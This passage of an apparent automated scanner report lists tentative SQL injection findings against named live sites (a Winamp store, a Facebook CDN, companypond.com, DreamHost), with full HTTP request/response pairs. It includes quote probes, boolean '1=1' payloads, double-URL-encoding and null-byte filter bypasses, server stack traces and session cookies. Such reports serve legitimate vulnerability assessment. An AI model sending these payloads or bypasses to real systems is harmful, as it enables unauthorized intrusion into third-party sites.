Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?1''=1&Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=131704878770,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:47:41 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59

1.20. http://shop.winamp.com/store [productID parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shop.winamp.com
Path:   /store

Issue detail

The productID parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the productID parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500%2527 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=67280272038,0)
Date: Sun, 27 Feb 2011 17:46:06 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 25208


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
-!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500%2527"-->
...[SNIP]...
<pre>java.lang.NullPointerException
   at com.digitalriver.security.SecurityModuleImpl.isPageAllowed(SecurityModuleImpl.java:762)
   at sun.reflect.GeneratedMethodAccessor290.invoke(Unknown Source)
   at sun.reflect.DelegatingMethodAccessorIm
...[SNIP]...

Request 2

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500%2527%2527 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500%2527%2527
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=67280272104,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:46:06 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59

1.21. http://shop.winamp.com/store [s_pers cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shop.winamp.com
Path:   /store

Issue detail

The s_pers cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_pers cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B%2527; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=131704869494,0)
Date: Sun, 27 Feb 2011 17:47:32 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 24205


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
-!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"-->
...[SNIP]...
<pre>javax.servlet.ServletException: Required Page Parameter: productID not provided
   at com.digitalriver.system.controller.SiteflowPlugin.appendURLParamsAndSection(SiteflowPlugin.java:283)
   at com.digitalriver.system.controller.Siteflo
...[SNIP]...

Request 2

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B%2527%2527; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=131704869912,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:47:33 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59

1.22. http://shop.winamp.com/store [s_sess cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shop.winamp.com
Path:   /store

Issue detail

The s_sess cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sess cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%2527

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=131704872526,0)
Date: Sun, 27 Feb 2011 17:47:36 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 24205


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
-!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"-->
...[SNIP]...
<pre>javax.servlet.ServletException: Required Page Parameter: productID not provided
   at com.digitalriver.system.controller.SiteflowPlugin.appendURLParamsAndSection(SiteflowPlugin.java:283)
   at com.digitalriver.system.controller.Siteflo
...[SNIP]...

Request 2

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%2527%2527

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=131704873667,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:47:36 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59

1.23. https://shop.winamp.com/store [BIGipServerp-drh-dc1pod5-pool1-active cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://shop.winamp.com
Path:   /store

Issue detail

The BIGipServerp-drh-dc1pod5-pool1-active cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the BIGipServerp-drh-dc1pod5-pool1-active cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /store?Action=DisplayPage&Locale=en_US&SiteID=winamp&id=QuickBuyCartPage HTTP/1.1
Host: shop.winamp.com
Connection: keep-alive
Referer: http://forums.winamp.com/login.php?do=login
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828673274-New%7C1361900673274%3B%20s_nrgvo%3DNew%7C1361900673275%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/buy%252526ot%25253DA%3B; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000'

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=114525008612,0)
Date: Sun, 27 Feb 2011 17:47:40 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 82107


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<pre>java.lang.RuntimeException: java.lang.RuntimeException: java.lang.RuntimeException: Error serving pageContext.
   at com.digitalriver.site.taglib.StyleTag.doStartTagInternal(StyleTag.java:47)
   at com.digitalriver.taglib.TagProfil
...[SNIP]...

Request 2

GET /store?Action=DisplayPage&Locale=en_US&SiteID=winamp&id=QuickBuyCartPage HTTP/1.1
Host: shop.winamp.com
Connection: keep-alive
Referer: http://forums.winamp.com/login.php?do=login
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828673274-New%7C1361900673274%3B%20s_nrgvo%3DNew%7C1361900673275%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/buy%252526ot%25253DA%3B; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000''

Response 2

HTTP/1.1 302 Moved Temporarily
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, private
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Location: http://shop.winamp.com:80/store?Action=DisplayPage&Env=BASE&Locale=en_US&SiteID=winamp&id=QuickBuyCartPage
Content-Type: text/plain
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=24330695573,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:47:40 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59

1.24. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/QsQtRaU6mGT.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yF/r/QsQtRaU6mGT.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /rsrc.php/v1/yF/r'%20and%201%3d1--%20/QsQtRaU6mGT.css HTTP/1.1
Host: static.ak.fbcdn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 7
Content-Type: text/html; charset=utf-8
X-Bad-Checksum: yF
X-Powered-By: HPHP
X-FB-Server: 10.138.64.184
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Sun, 27 Feb 2011 23:10:57 GMT
Date: Sat, 26 Feb 2011 23:10:57 GMT
Connection: close

/*bcs*/

Request 2

GET /rsrc.php/v1/yF/r'%20and%201%3d2--%20/QsQtRaU6mGT.css HTTP/1.1
Host: static.ak.fbcdn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 403 Forbidden
X-Bad-Prefix: /v1/yF/r' and 1=2-- /QsQtRaU6mGT.css
Content-Type: text/html; charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.138.17.183
Content-Length: 0
Vary: Accept-Encoding
Expires: Sat, 26 Feb 2011 23:10:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Feb 2011 23:10:57 GMT
Connection: close

1.25. http://www.companypond.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.companypond.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /?1%00'=1 HTTP/1.1
Host: www.companypond.com
Proxy-Connection: keep-alive
Referer: http://adam.companypond.com/peeps.php?email=4240be8e2dc90b4aef080848af60435f&bio=no
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:52:16 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=fa03e4bec9c60463fc37a80107a29a5b; path=/
X-Ua-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 73454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="cs" lang="cs">
<head>
<meta htt
...[SNIP]...
Marketing Company based in Morristown, NJ with offices in Miami, FL. Our primary focus is helping small to medium sized businesses achieve online marketing success. Our clients come to Optimum7 after failing to achieve their marketing objectives online and...
        <a href="/optimum7" title="Profile for optimum7">
...[SNIP]...

Request 2

GET /?1%00''=1 HTTP/1.1
Host: www.companypond.com
Proxy-Connection: keep-alive
Referer: http://adam.companypond.com/peeps.php?email=4240be8e2dc90b4aef080848af60435f&bio=no
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:52:18 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=fdc0940037a69faf36c2ec348d2ba8d4; path=/
X-Ua-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 66519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="cs" lang="cs">
<head>
<meta htt
...[SNIP]...
1.26. http://www.dreamhost.com/r.cgi [129733 parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dreamhost.com
Path:   /r.cgi

Issue detail

The 129733 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 129733 parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /r.cgi?129733' HTTP/1.1
Host: www.dreamhost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 502 Bad Gateway
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:19:38 GMT
Content-Type: text/html
Connection: close
Content-Length: 575

<html>
<head><title>502 Bad Gateway</title></head>
<body bgcolor="white">
<center><h1>502 Bad Gateway</h1></center>
<hr><center>nginx/0.8.53</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
...[SNIP]...

Request 2

GET /r.cgi?129733'' HTTP/1.1
Host: www.dreamhost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 302 Found
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:19:39 GMT
Content-Type: text/plain
Connection: close
Set-Cookie: referrer=; domain=.dreamhost.com; path=/; expires=Sun, 27-Feb-2011 23:13:20 GMT
Set-Cookie: referred=rewards%7C129733%27%27; domain=.dreamhost.com; path=/; expires=Sun, 27-Feb-2011 23:13:21 GMT
Set-Cookie: redir=12722601; domain=.dreamhost.com; path=/; expires=Sun, 27-Feb-2011 23:13:21 GMT
Location: http://www.dreamhost.com/
Content-Length: 0

1.27. http://www.dreamhost.com/r.cgi [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dreamhost.com
Path:   /r.cgi

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /r.cgi?1'=1 HTTP/1.1
Host: www.dreamhost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 502 Bad Gateway
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:19:36 GMT
Content-Type: text/html
Connection: close
Content-Length: 575

<html>
<head><title>502 Bad Gateway</title></head>
<body bgcolor="white">
<center><h1>502 Bad Gateway</h1></center>
<hr><center>nginx/0.8.53</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
...[SNIP]...

Request 2

GET /r.cgi?1''=1 HTTP/1.1
Host: www.dreamhost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 302 Found
Server: nginx/0.8.53
